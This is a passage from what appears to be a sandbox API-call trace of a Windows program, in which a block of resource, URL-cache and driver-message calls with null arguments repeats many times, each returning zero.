lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.662] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.662] GetUserDefaultLangID () returned 0x409 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.662] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.662] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.662] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.662] GetUserDefaultLangID () returned 0x409 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.662] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.662] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.662] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.662] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.662] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.662] GetUserDefaultLangID () returned 0x409 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.663] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.663] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.663] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.663] GetUserDefaultLangID () returned 0x409 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.663] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.663] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.663] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.663] GetUserDefaultLangID () returned 0x409 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.663] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.663] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.663] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.663] GetUserDefaultLangID () returned 0x409 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.663] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.663] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.663] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.663] GetUserDefaultLangID () returned 0x409 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.663] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.663] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.663] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.663] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.663] GetUserDefaultLangID () returned 0x409 [0185.663] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.664] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.664] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.664] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.664] GetUserDefaultLangID () returned 0x409 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.664] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.664] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.664] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.664] GetUserDefaultLangID () returned 0x409 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.664] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.664] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.664] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.664] GetUserDefaultLangID () returned 0x409 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.664] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.664] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.664] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.664] GetUserDefaultLangID () returned 0x409 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.664] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.664] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.664] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.664] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.664] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.664] GetUserDefaultLangID () returned 0x409 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.665] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.665] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.665] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.665] GetUserDefaultLangID () returned 0x409 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.665] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.665] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.665] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.665] GetUserDefaultLangID () returned 0x409 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.665] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.665] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.665] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.665] GetUserDefaultLangID () returned 0x409 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.665] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.665] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.665] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.665] GetUserDefaultLangID () returned 0x409 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.665] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.665] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.665] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.665] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.665] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.665] GetUserDefaultLangID () returned 0x409 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.666] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.666] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.666] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.666] GetUserDefaultLangID () returned 0x409 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.666] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.666] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.666] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.666] GetUserDefaultLangID () returned 0x409 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.666] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.666] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.666] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.666] GetUserDefaultLangID () returned 0x409 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.666] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.666] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.666] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.666] GetUserDefaultLangID () returned 0x409 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.666] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.666] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.666] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.666] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.666] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.666] GetUserDefaultLangID () returned 0x409 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.667] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.667] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.667] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.667] GetUserDefaultLangID () returned 0x409 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.667] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.667] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.667] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.667] GetUserDefaultLangID () returned 0x409 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.667] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.667] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.667] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.667] GetUserDefaultLangID () returned 0x409 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.667] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.667] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.667] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.667] GetUserDefaultLangID () returned 0x409 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.667] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.667] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.667] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.667] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, 